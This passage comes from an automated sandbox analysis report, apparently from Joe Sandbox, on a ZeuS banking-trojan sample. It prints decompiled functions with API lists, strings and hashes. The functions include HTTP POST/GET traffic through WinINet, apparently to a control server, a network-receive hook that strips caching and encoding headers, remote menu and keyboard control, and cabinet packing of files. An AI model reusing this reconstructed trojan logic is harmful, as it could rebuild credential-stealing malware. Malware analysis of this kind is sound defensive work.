				if(E00409C4B( &_v36,  *((intOrPtr*)(_t106 + 4))) == 0) {
					L25:
					return 0;
				}
				_t53 = InternetOpenA( *0x423c24, 0, 0, 0, 0);
				_v44 = _t53;
				if(_t53 == 0) {
					L24:
					E004051E6(_v36);
					E004051E6(_v32);
					goto L25;
				}
				_t56 = InternetConnectA(_t53, _v36, _v24, 0, 0, 3, 0, 0);
				_v20 = _t56;
				if(_t56 == 0) {
					L23:
					InternetCloseHandle(_v44);
					goto L24;
				}
				_t58 =  *_t106;
				_t99 = "POST";
				if( *((char*)(_t58 + 0x18)) != 1) {
					_t99 = "GET";
				}
				_t97 = HttpOpenRequestA(_v20, _t99, _v32, "HTTP/1.1",  *(_t58 + 8), 0, (0 | _v22 != 0x00000002) - 0x00000001 & 0x00800000 | 0x8404f700, 0);
				_v16 = _t97;
				if(_t97 == 0) {
					L22:
					InternetCloseHandle(_v20);
					goto L23;
				} else {
					E0041CC4A(_t99,  &_v552);
					_t63 = 0xe;
					E0040F314(_t63,  &_v64);
					_t66 =  *_a4;
					if( *((intOrPtr*)( *_a4 + 0x20)) > 0) {
						_t94 = E00405FAA( &_v12,  &_v64,  *((intOrPtr*)(_t66 + 0x1c)));
						_t114 = _t114 + 0xc;
						if(_t94 > 0) {
							HttpAddRequestHeadersA(_t97, _v12, 0xffffffff, 0xa0000000);
							E004051E6(_v12);
						}
					}
					_t67 = 0xf;
					E0040F314(_t67,  &_v56);
					_v40 = E00405D35( &_v548);
					_t109 = E004051B6(2 + _t69 * 6);
					if(_t109 == 0) {
						_t109 = 0;
					} else {
						E00409F76(_t109,  &_v548, _v40);
						_t97 = _v16;
					}
					if(_t109 != 0 && E00405FAA( &_v12,  &_v56, _t109) > 0) {
						HttpAddRequestHeadersA(_t97, _v12, 0xffffffff, 0xa0000000);
						E004051E6(_v12);
					}
					E004051E6(_t109);
					_t110 = _a4;
					if(HttpSendRequestA(_t97, 0, 0,  *( *_t110 + 0x24),  *( *_t110 + 0x28)) != 1) {
						L21:
						InternetCloseHandle(_t97);
						goto L22;
					} else {
						_v12 = 4;
						_a4 = 0;
						if(HttpQueryInfoA(_t97, 0x20000013,  &_a4,  &_v12, 0) != 1 || _a4 != 0xc8) {
							goto L21;
						} else {
							if(E0040731C( &_v12, _t97) != 0) {
								E004051E6(_t80);
							}
							E004051E6(_v36);
							E004051E6(_v32);
							 *(_t110 + 8) = _v16;
							goto L25;
						}
					}
				}
			}

0x004126c1
0x004126d1
0x004128c5
0x004128c9
0x004128c9
0x004126e3
0x004126e9
0x004126ee
0x004128b3
0x004128b6
0x004128be
0x00000000
0x004128be
0x00412701
0x00412707
0x0041270c
0x004128aa
0x004128ad
0x00000000
0x004128ad
0x00412712
0x00412718
0x0041271d
0x0041271f
0x0041271f
0x00412752
0x00412754
0x00412759
0x004128a1
0x004128a4
0x00000000
0x0041275f
0x00412766
0x00412770
0x00412771
0x00412779
0x0041277e
0x0041278a
0x0041278f
0x00412794
0x004127a1
0x004127aa
0x004127aa
0x00412794
0x004127b4
0x004127b5
0x004127c5
0x004127d3
0x004127d7
0x004127ef
0x004127d9
0x004127e5
0x004127ea
0x004127ea
0x004127f3
0x00412815
0x0041281e
0x0041281e
0x00412824
0x00412829
0x00412840
0x0041289a
0x0041289b
0x00000000
0x00412842
0x00412851
0x00412858
0x00412864
0x00000000
0x0041286f
0x0041287a
0x0041287d
0x0041287d
0x00412885
0x0041288d
0x00412895
0x00000000
0x00412895
0x00412864
0x00412840

APIs

Part of subcall function 00409C4B: InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 00409C7A

InternetOpenA.WININET(00000000,00000000,00000000,00000000,?), ref: 004126E3
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00412701
HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,?,00000000,-00000001,00000000), ref: 0041274C
HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 004127A1
HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 00412815
HttpSendRequestA.WININET(00000000,00000000,00000000,?,?), ref: 00412837
HttpQueryInfoA.WININET(00000000,20000013,?,?,00000000), ref: 0041285B
InternetCloseHandle.WININET(00000000), ref: 0041289B
InternetCloseHandle.WININET(?), ref: 004128A4

Part of subcall function 0040731C: InternetQueryOptionA.WININET(00000000,00000022,00000000,000000C8), ref: 00407330
Part of subcall function 0040731C: GetLastError.KERNEL32 ref: 0040733A
Part of subcall function 0040731C: InternetQueryOptionA.WININET(00000022,00000022,00000000,000000C8), ref: 0040735A

Part of subcall function 004051E6: HeapFree.KERNEL32(00000000,00000000,004069DD,00000000,?,?,?,0041C28A,00000000,0041C766), ref: 004051F9

InternetCloseHandle.WININET(?), ref: 004128AD

Strings

POST, xrefs: 00412718
GET, xrefs: 0041271F, 00412748
HTTP/1.1, xrefs: 00412740

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: Internet$Http$Request$CloseHandleQuery$HeadersOpenOption$ConnectCrackErrorFreeHeapInfoLastSend
String ID: GET$HTTP/1.1$POST
API String ID: 1023423486-2753618334
Opcode ID: ea349e37b470a2333f2700bd55168c120a9986c392f984e3321c633f36e8ef20
Instruction ID: c7486255c6e3e7712db06eeed57dd6127339dd2851a6dfc3edae1dc3710d4599
Opcode Fuzzy Hash: ea349e37b470a2333f2700bd55168c120a9986c392f984e3321c633f36e8ef20
Instruction Fuzzy Hash: B9519C72800115BBCF11ABA1DE49EDFBF79EF48354F104126F505F62A1CB389A90DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040D88C, Relevance: 22.6, APIs: 15, Instructions: 132
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E0040D88C(unsigned int __ecx, struct HWND__* _a4, signed short _a8) {
				struct tagRECT _v20;
				signed int _v24;
				signed int _v28;
				signed short _t37;
				int _t46;
				BYTE* _t47;
				signed short _t51;
				int _t63;
				int _t64;
				unsigned int _t65;
				struct HMENU__* _t70;
				struct HMENU__* _t74;
				void* _t78;

				_t65 = __ecx;
				_t37 = _a8;
				_t78 = _t37 - 0xfffffffd;
				if(_t78 == 0) {
					SetKeyboardState( *0x423248);
					L23:
					SetEvent( *0x423244);
					return 0;
				}
				if(_t78 <= 0 || _t37 > 0xffffffff) {
					_v20.top = _t37 >> 0x10;
					_v20.right = _t65 & 0x0000ffff;
					_v20.left = _t37 & 0x0000ffff;
					_v20.bottom = _t65 >> 0x10;
					E00417275( &_v20, _t65 >> 0x10, _t37 & 0x0000ffff, 0x423238, _a4, 0);
					goto L23;
				} else {
					_t70 = GetMenu(_a4);
					if(_t70 == 0) {
						goto L23;
					}
					_v24 = _v24 | 0xffffffff;
					_t46 = GetMenuItemCount(_t70);
					_t63 = 0;
					_v28 = _t46;
					if(_t46 <= 0) {
						L8:
						_t47 =  *0x423248;
						_push(_t47[0x104]);
						_t64 = MenuItemFromPoint(_a4, _t70, _t47[0x100]);
						if(_t64 == 0xffffffff) {
							goto L23;
						}
						_v28 = GetMenuState(_t70, _t64, 0x400);
						if(_v24 != _t64) {
							EndMenu();
						}
						HiliteMenuItem(_a4, _t70, _t64, 0x480);
						if(_a8 != 0xfffffffe && (_v28 & 0x00000003) == 0) {
							if((_v28 & 0x00000010) == 0) {
								if((_v28 & 0x00000800) == 0) {
									_t51 = GetMenuItemID(_t70, _t64);
									if(_t51 == 0xffffffff) {
										goto L23;
									}
									L20:
									SendMessageW(_a4, 0x111, _t51 & 0x0000ffff, 0);
									goto L23;
								}
								_t51 = 0;
								goto L20;
							}
							_t74 = GetSubMenu(_t70, _t64);
							if(_t74 != 0 && GetMenuItemRect(_a4, _t70, _t64,  &_v20) != 0) {
								TrackPopupMenuEx(_t74, 0x4000, _v20, _v20.bottom, _a4, 0);
							}
						}
						goto L23;
					} else {
						goto L5;
					}
					do {
						L5:
						if(GetMenuState(_t70, _t63, 0x400) < 0) {
							HiliteMenuItem(_a4, _t70, _t63, 0x400);
							_v24 = _t63;
						}
						_t63 = _t63 + 1;
					} while (_t63 < _v28);
					goto L8;
				}
			}

0x0040d88c
0x0040d892
0x0040d89b
0x0040d89e
0x0040da1d
0x0040da23
0x0040da29
0x0040da37
0x0040da37
0x0040d8a4
0x0040d9ec
0x0040d9f8
0x0040da08
0x0040da0c
0x0040da10
0x00000000
0x0040d8b3
0x0040d8bc
0x0040d8c0
0x00000000
0x00000000
0x0040d8c6
0x0040d8cc
0x0040d8d2
0x0040d8d4
0x0040d8df
0x0040d905
0x0040d905
0x0040d90a
0x0040d920
0x0040d925
0x00000000
0x00000000
0x0040d934
0x0040d93c
0x0040d93e
0x0040d93e
0x0040d94e
0x0040d958
0x0040d96e
0x0040d9bd
0x0040d9c5
0x0040d9ce
0x00000000
0x00000000
0x0040d9d0
0x0040d9de
0x00000000
0x0040d9de
0x0040d9bf
0x00000000
0x0040d9bf
0x0040d978
0x0040d97c
0x0040d9ad
0x0040d9ad
0x0040d97c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040d8e1
0x0040d8e1
0x0040d8ec
0x0040d8f4
0x0040d8fa
0x0040d8fa
0x0040d8fe
0x0040d8ff
0x00000000
0x0040d8e1

APIs

GetMenu.USER32(?), ref: 0040D8B6
GetMenuItemCount.USER32 ref: 0040D8CC
GetMenuState.USER32 ref: 0040D8E4
HiliteMenuItem.USER32(?,00000000,00000000,00000400), ref: 0040D8F4
MenuItemFromPoint.USER32(?,00000000,?,?), ref: 0040D91A
GetMenuState.USER32 ref: 0040D92E
EndMenu.USER32 ref: 0040D93E
HiliteMenuItem.USER32(?,00000000,00000000,00000480), ref: 0040D94E
GetSubMenu.USER32 ref: 0040D972
GetMenuItemRect.USER32(?,00000000,00000000,?), ref: 0040D98C
TrackPopupMenuEx.USER32(00000000,00004000,?,?,?,00000000), ref: 0040D9AD
GetMenuItemID.USER32(00000000,00000000), ref: 0040D9C5
SendMessageW.USER32(?,00000111,?,00000000), ref: 0040D9DE
SetKeyboardState.USER32 ref: 0040DA1D
SetEvent.KERNEL32 ref: 0040DA29

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: Menu$Item$State$Hilite$CountEventFromKeyboardMessagePointPopupRectSendTrack
String ID:
API String ID: 751066993-0
Opcode ID: c770205009bb6f800fd79cd5e676fa3caccac14cab55f9b1c3c9498a3c816af1
Instruction ID: 3a614a910883821af988345181461a7b175372144327621c3ca52653278fd11a
Opcode Fuzzy Hash: c770205009bb6f800fd79cd5e676fa3caccac14cab55f9b1c3c9498a3c816af1
Instruction Fuzzy Hash: FB410170604305AFDB109F69DD48E7B7EB8EB85760F00063AF995B11F0C3388949DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00408ECC, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 52
libraryloadermemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00408ECC() {
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t7;
				void* _t9;
				intOrPtr _t16;
				intOrPtr _t18;

				if( *0x4231b4 != 0) {
					L9:
					 *0x4231b4 =  *0x4231b4 + 1;
					return 1;
				} else {
					_t2 = LoadLibraryA("cabinet.dll");
					 *0x4231b0 = _t2;
					if(_t2 == 0) {
						L8:
						return 0;
					} else {
						 *0x4227dc = GetProcAddress(_t2, "FCICreate");
						 *0x4231a0 = GetProcAddress( *0x4231b0, "FCIAddFile");
						 *0x4223d4 = GetProcAddress( *0x4231b0, "FCIFlushCabinet");
						_t7 = GetProcAddress( *0x4231b0, "FCIDestroy");
						 *0x4231a8 = _t7;
						_t16 =  *0x4227dc; // 0x0
						if(_t16 == 0 ||  *0x4231a0 == 0) {
							L7:
							FreeLibrary( *0x4231b0);
							goto L8;
						} else {
							_t18 =  *0x4223d4; // 0x0
							if(_t18 == 0 || _t7 == 0) {
								goto L7;
							} else {
								_t9 = HeapCreate(0, 0x80000, 0);
								 *0x4223d0 = _t9;
								if(_t9 != 0) {
									goto L9;
								} else {
									goto L7;
								}
							}
						}
					}
				}
			}

0x00408ed5
0x00408f80
0x00408f80
0x00408f89
0x00408edb
0x00408ee0
0x00408ee6
0x00408eed
0x00408f7c
0x00408f7f
0x00408ef3
0x00408f0d
0x00408f1f
0x00408f31
0x00408f36
0x00408f38
0x00408f3e
0x00408f44
0x00408f70
0x00408f76
0x00000000
0x00408f4e
0x00408f4e
0x00408f54
0x00000000
0x00408f5a
0x00408f61
0x00408f67
0x00408f6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00408f6e
0x00408f54
0x00408f44
0x00408eed

APIs

LoadLibraryA.KERNEL32(cabinet.dll,00000000,00408FB3,?,004091CF,?), ref: 00408EE0
GetProcAddress.KERNEL32(00000000,FCICreate), ref: 00408F00
GetProcAddress.KERNEL32(FCIAddFile), ref: 00408F12
GetProcAddress.KERNEL32(FCIFlushCabinet), ref: 00408F24
GetProcAddress.KERNEL32(FCIDestroy), ref: 00408F36
HeapCreate.KERNEL32(00000000,00080000,00000000,?,004091CF,?), ref: 00408F61
FreeLibrary.KERNEL32(?,004091CF,?), ref: 00408F76

Strings

FCIAddFile, xrefs: 00408F02
FCIDestroy, xrefs: 00408F26
FCIFlushCabinet, xrefs: 00408F14
cabinet.dll, xrefs: 00408EDB
FCICreate, xrefs: 00408EFA

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: AddressProc$Library$CreateFreeHeapLoad
String ID: FCIAddFile$FCICreate$FCIDestroy$FCIFlushCabinet$cabinet.dll
API String ID: 2040708800-1163896595
Opcode ID: a1c818729c423b2a45dca89a8c706205393ec7e888e7b8551b47c21d90e2d254
Instruction ID: 928e74d1de24a7aa68b2efb95a563f825ce651d431d217c1fd235f185c0fd675
Opcode Fuzzy Hash: a1c818729c423b2a45dca89a8c706205393ec7e888e7b8551b47c21d90e2d254
Instruction Fuzzy Hash: 0411FE30B04750AAD7319F35AE44A267EB6F788752398027BE940E2264DB7D1596DA0C

Uniqueness

Uniqueness Score: -1.00%

Function 00410310, Relevance: 18.3, APIs: 9, Strings: 3, Instructions: 254
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			E00410310(void* __edx, intOrPtr _a4, signed int _a8, signed char _a12) {
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v56;
				signed int _v72;
				char _v76;
				signed int _v80;
				signed int _v84;
				signed char _v88;
				signed int _v92;
				signed int _v100;
				intOrPtr _v104;
				signed int _v108;
				intOrPtr _v128;
				void* __esi;
				signed int _t111;
				signed int _t113;
				signed char _t114;
				signed int _t115;
				void* _t117;
				signed char _t121;
				signed int _t122;
				signed int _t125;
				signed int _t128;
				signed char _t130;
				signed char _t136;
				intOrPtr _t149;
				void* _t165;
				signed char _t166;
				void* _t172;
				intOrPtr _t178;
				signed int _t184;
				void* _t186;
				void* _t188;
				signed int _t202;
				signed int _t203;

				if(E0041CAA4() == 0 || _a8 == 0 || _a12 <= 0) {
					L9:
					_t111 =  *0x4233c4(_a4, _a8, _a12);
					goto L10;
				} else {
					EnterCriticalSection(0x4233d4);
					_t192 = _a4;
					_t184 = E0040F394(_a4);
					_v84 = _t184;
					if(_t184 == 0xffffffff) {
						L8:
						LeaveCriticalSection(0x4233d4);
						goto L9;
					}
					_t186 = _t184 * 0x38 +  *0x4233f0;
					if( *(_t186 + 0x20) > 0) {
						L29:
						_t113 =  *(_t186 + 0x24);
						_t188 =  *(_t186 + 0x20) - _t113;
						LeaveCriticalSection(0x4233d4);
						_t195 = _a4;
						_t114 =  *0x4233c4(_a4,  *((intOrPtr*)(_t186 + 0x1c)) + _t113, _t188);
						_v88 = _t114;
						__eflags = _t114 - 0xffffffff;
						if(_t114 != 0xffffffff) {
							EnterCriticalSection(0x4233d4);
							_t115 = E0040F394(_t195);
							__eflags = _t115 - 0xffffffff;
							if(_t115 != 0xffffffff) {
								_t166 = _v88;
								_t117 = _t115 * 0x38 +  *0x4233f0;
								__eflags = _t166 - _t188;
								if(_t166 != _t188) {
									 *((intOrPtr*)(_t117 + 0x24)) =  *((intOrPtr*)(_t117 + 0x24)) + _t166;
									_t92 = _t117 + 0x28;
									 *_t92 =  *(_t117 + 0x28) - 1;
									__eflags =  *_t92;
									_v88 = 1;
								} else {
									_t88 = _t117 + 0x1c; // -4338644
									_v88 =  *(_t117 + 0x28);
									E00405299(E004051E6( *_t88), _t88, 0, 0x10);
								}
							} else {
								_v88 = _v88 | _t115;
								 *0x4233d0(0xffffe890, 8);
							}
							LeaveCriticalSection(0x4233d4);
						}
						L36:
						_t111 = _v88;
						L10:
						return _t111;
					}
					if( *(_t186 + 8) > 0) {
						L38:
						LeaveCriticalSection(0x4233d4);
						_t197 = _a4;
						_t121 =  *0x4233c4(_a4, _a8, _a12);
						_v88 = _t121;
						__eflags = _t121 - 0xffffffff;
						if(_t121 != 0xffffffff) {
							EnterCriticalSection(0x4233d4);
							_t122 = E0040F394(_t197);
							__eflags = _t122 - 0xffffffff;
							if(_t122 != 0xffffffff) {
								_t172 = _t122 * 0x38 +  *0x4233f0;
								_t178 =  *((intOrPtr*)(_t172 + 8));
								__eflags = _v88 - _t178;
								if(_v88 > _t178) {
									E0040F452(_t122);
								} else {
									 *((intOrPtr*)(_t172 + 8)) = _t178 - _v88;
								}
							} else {
								_v88 = _v88 | _t122;
								 *0x4233d0(0xffffe890, 8);
							}
							LeaveCriticalSection(0x4233d4);
						}
						goto L36;
					}
					_t125 = E0040F888( &_v76, _t192, _a8, _a12);
					_v92 = _t125;
					if(_t125 != 0xffffffff) {
						__eflags = _v72;
						if(_v72 == 0) {
							L37:
							E00412628( &_v76);
							_t128 = _v80 + _a12;
							__eflags = _t128;
							 *(_t186 + 8) = _t128;
							goto L38;
						}
						_t130 = E00411CFA( &_v76);
						_v88 = _t130;
						__eflags = _t130 & 0x00000001;
						if((_t130 & 0x00000001) == 0) {
							_v92 = 0;
							_v88 = 0;
							__eflags = _t130 & 0x00000002;
							if(__eflags != 0) {
								_t203 = E00405239(__eflags, _a8, _a12);
								_v100 = _t203;
								__eflags = _t203;
								if(_t203 != 0) {
									E00412692( *((intOrPtr*)(_t186 + 0x10)),  *((intOrPtr*)(_t186 + 0xc)));
									E004051E6( *(_t186 + 0x14));
									E004051E6( *((intOrPtr*)(_t186 + 4)));
									_t149 = E00405644(_v76, _v80);
									 *(_t186 + 0x14) =  *(_t186 + 0x14) & 0x00000000;
									_t38 = _t186 + 0x18;
									 *_t38 =  *(_t186 + 0x18) & 0x00000000;
									__eflags =  *_t38;
									 *((intOrPtr*)(_t186 + 4)) = _t149;
									 *((intOrPtr*)(_t186 + 0xc)) = _v36;
									 *((intOrPtr*)(_t186 + 0x10)) = _v32;
									_v128 = E0040A114(E0040A114(E0040A190(_t203, _a12, "Accept-Encoding", "identity"), _t165, _t203, "TE"), _t165, _t203, "If-Modified-Since");
								} else {
									E00412692(_v16, _v20);
								}
							}
							__eflags = _v84 & 0x00000004;
							if((_v84 & 0x00000004) == 0) {
								L27:
								__eflags = _v92;
								if(_v92 == 0) {
									goto L37;
								}
								E00412628( &_v76);
								_t70 = _t186 + 0x24;
								 *_t70 =  *(_t186 + 0x24) & 0x00000000;
								__eflags =  *_t70;
								 *(_t186 + 8) = _v80;
								 *((intOrPtr*)(_t186 + 0x1c)) = _v92;
								 *(_t186 + 0x20) = _v88;
								 *(_t186 + 0x28) = _a12;
								goto L29;
							}
							_t202 = _v92;
							__eflags = _t202;
							if(__eflags != 0) {
								_t136 = _v88;
							} else {
								_t202 = _a8;
								_t136 = _a12;
							}
							_v84 = _t136;
							_v104 = E0040FB68(_v84, __eflags, _t202, _v40, _v36,  &_v92);
							E004051E6(_v56);
							__eflags = _v108;
							if(_v108 != 0) {
								__eflags = _t202 - _a8;
								if(_t202 != _a8) {
									E004051E6(_t202);
								}
							} else {
								__eflags = _t202 - _a8;
								if(_t202 == _a8) {
									goto L37;
								}
								_v92 = _t202;
								_v88 = _v84;
							}
							goto L27;
						} else {
							E00412628( &_v76);
							LeaveCriticalSection(0x4233d4);
							_t111 =  *0x4233d0(0xffffe8a3, 0) | 0xffffffff;
							goto L10;
						}
					} else {
						E0040F452(_v84);
						E00412628( &_v76);
						goto L8;
					}
				}
			}

0x00410323
0x0041039b
0x004103a4
0x00000000
0x00410331
0x00410337
0x0041033d
0x00410345
0x00410347
0x0041034e
0x00410394
0x00410395
0x00000000
0x00410395
0x00410353
0x0041035d
0x00410539
0x00410539
0x00410545
0x00410547
0x0041054f
0x00410553
0x0041055c
0x00410560
0x00410563
0x00410566
0x0041056c
0x00410571
0x00410574
0x0041058b
0x00410592
0x00410598
0x0041059a
0x004105b9
0x004105bc
0x004105bc
0x004105bc
0x004105bf
0x0041059c
0x0041059f
0x004105a4
0x004105b2
0x004105b2
0x00410576
0x00410576
0x00410581
0x00410588
0x004105c8
0x004105c8
0x004105ce
0x004105ce
0x004103ad
0x004103b3
0x004103b3
0x00410367
0x004105ea
0x004105f1
0x004105f6
0x004105fd
0x00410606
0x0041060a
0x0041060d
0x00410610
0x00410616
0x0041061b
0x0041061e
0x0041063a
0x00410640
0x00410643
0x00410647
0x00410652
0x00410649
0x0041064d
0x0041064d
0x00410620
0x00410620
0x0041062b
0x00410632
0x00410658
0x00410658
0x00000000
0x0041060d
0x00410378
0x0041037d
0x00410384
0x004103b6
0x004103ba
0x004105d7
0x004105db
0x004105e4
0x004105e4
0x004105e7
0x00000000
0x004105e7
0x004103c5
0x004103ca
0x004103ce
0x004103d0
0x004103f6
0x004103fa
0x004103fe
0x00410400
0x00410411
0x00410413
0x00410417
0x00410419
0x00410430
0x00410438
0x00410440
0x0041044d
0x00410452
0x00410456
0x00410456
0x00410456
0x0041045f
0x0041046e
0x00410476
0x00410496
0x0041041b
0x00410423
0x00410423
0x00410419
0x0041049a
0x0041049f
0x00410506
0x00410506
0x0041050b
0x00000000
0x00000000
0x00410515
0x0041051e
0x0041051e
0x0041051e
0x00410522
0x00410529
0x00410530
0x00410536
0x00000000
0x00410536
0x004104a1
0x004104a5
0x004104a7
0x004104b1
0x004104a9
0x004104a9
0x004104ac
0x004104ac
0x004104b5
0x004104d4
0x004104d8
0x004104dd
0x004104e2
0x004104fb
0x004104fe
0x00410501
0x00410501
0x004104e4
0x004104e4
0x004104e7
0x00000000
0x00000000
0x004104f1
0x004104f5
0x004104f5
0x00000000
0x004103d2
0x004103d6
0x004103dc
0x004103f1
0x00000000
0x004103f1
0x00410386
0x0041038a
0x0041038f
0x00000000
0x0041038f
0x00410384

APIs

Part of subcall function 0041CAA4: WaitForSingleObject.KERNEL32(00000000,0041BE2C,?,19367402,00000001), ref: 0041CAAC

EnterCriticalSection.KERNEL32(004233D4), ref: 00410337
LeaveCriticalSection.KERNEL32(004233D4), ref: 00410395
LeaveCriticalSection.KERNEL32(004233D4,?), ref: 004103DC
LeaveCriticalSection.KERNEL32(004233D4), ref: 00410547
EnterCriticalSection.KERNEL32(004233D4), ref: 00410566
LeaveCriticalSection.KERNEL32(004233D4), ref: 004105C8
LeaveCriticalSection.KERNEL32(004233D4), ref: 004105F1
EnterCriticalSection.KERNEL32(004233D4), ref: 00410610
LeaveCriticalSection.KERNEL32(004233D4), ref: 00410658

Strings

identity, xrefs: 0041045A
If-Modified-Since, xrefs: 0041048A
Accept-Encoding, xrefs: 00410466

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$ObjectSingleWait
String ID: Accept-Encoding$If-Modified-Since$identity
API String ID: 3286975823-3034467039
Opcode ID: e925a551951c226e26fa85d5d84b2f67f69ed88fd9109a886857c9a6f05ed017
Instruction ID: b8f3efee3db3d8e0af21727fccdc382b39fd359433b903162946265aa5c6dc80
Opcode Fuzzy Hash: e925a551951c226e26fa85d5d84b2f67f69ed88fd9109a886857c9a6f05ed017
Instruction Fuzzy Hash: CCA19E71504305AFCB10DF24DD45A8EBBA0FF48314F104A2EF854A72A1C778EA95CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040D5C5, Relevance: 18.1, APIs: 12, Instructions: 78
filesynchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D5C5(void** __eax, char _a4) {
				void* __esi;
				void* _t15;
				void* _t16;
				long _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;
				void* _t22;
				struct HDC__* _t23;
				void* _t24;
				void* _t25;
				void** _t41;

				_t41 = __eax;
				_t15 =  *(__eax + 0x1c);
				if(_t15 != 0) {
					DeleteObject(_t15);
				}
				_t16 = _t41[3];
				if(_t16 != 0) {
					CloseHandle(_t16);
				}
				_t17 = _t41[1];
				if(_t17 != 0xffffffff) {
					TlsFree(_t17);
				}
				_t18 = _t41[5];
				if(_t18 != 0) {
					CloseHandle(_t18);
				}
				_t19 = _t41[4];
				if(_t19 != 0) {
					UnmapViewOfFile(_t19);
				}
				_t20 =  *_t41;
				if(_t20 != 0) {
					_t20 = CloseHandle(_t20);
				}
				if(_a4 != 0) {
					_t21 = _t41[0x56];
					if(_t21 != 0) {
						SelectObject(_t41[0x55], _t21);
					}
					_t22 = _t41[0x57];
					if(_t22 != 0) {
						DeleteObject(_t22);
					}
					_t23 = _t41[0x55];
					if(_t23 != 0) {
						DeleteDC(_t23);
					}
					_t24 = _t41[0x58];
					if(_t24 != 0) {
						CloseHandle(_t24);
					}
					_t25 = _t41[0x60];
					if(_t25 != 0 && WaitForSingleObject(_t25, 0) != 0x102) {
						PostThreadMessageW(_t41[0x62], 0x12, 0, 0);
					}
					_t20 = E00406BF5( &(_t41[0x5f]));
				}
				return _t20;
			}

0x0040d5cd
0x0040d5cf
0x0040d5d5
0x0040d5d8
0x0040d5d8
0x0040d5da
0x0040d5e5
0x0040d5e8
0x0040d5e8
0x0040d5ea
0x0040d5f0
0x0040d5f3
0x0040d5f3
0x0040d5f9
0x0040d5fe
0x0040d601
0x0040d601
0x0040d603
0x0040d608
0x0040d60b
0x0040d60b
0x0040d611
0x0040d615
0x0040d618
0x0040d618
0x0040d61f
0x0040d621
0x0040d629
0x0040d632
0x0040d632
0x0040d638
0x0040d640
0x0040d643
0x0040d643
0x0040d645
0x0040d64d
0x0040d650
0x0040d650
0x0040d656
0x0040d65e
0x0040d661
0x0040d661
0x0040d663
0x0040d66b
0x0040d689
0x0040d689
0x0040d695
0x0040d695
0x0040d69d

APIs

DeleteObject.GDI32(?), ref: 0040D5D8
CloseHandle.KERNEL32(?,00000000,00423238,00000000,0040D7CC,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040D5E8
TlsFree.KERNEL32(?,00000000,00423238,00000000,0040D7CC,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040D5F3
CloseHandle.KERNEL32(?,00000000,00423238,00000000,0040D7CC,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040D601
UnmapViewOfFile.KERNEL32(?,00000000,00423238,00000000,0040D7CC,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040D60B
CloseHandle.KERNEL32(?,00000000,00423238,00000000,0040D7CC,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040D618
SelectObject.GDI32(?,?), ref: 0040D632
DeleteObject.GDI32(?), ref: 0040D643
DeleteDC.GDI32(?), ref: 0040D650
CloseHandle.KERNEL32(?,00000000,00423238,00000000,0040D7CC,00000000,00000000), ref: 0040D661
WaitForSingleObject.KERNEL32(?,00000000,00000000,00423238,00000000,0040D7CC,00000000,00000000), ref: 0040D670
PostThreadMessageW.USER32 ref: 0040D689

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

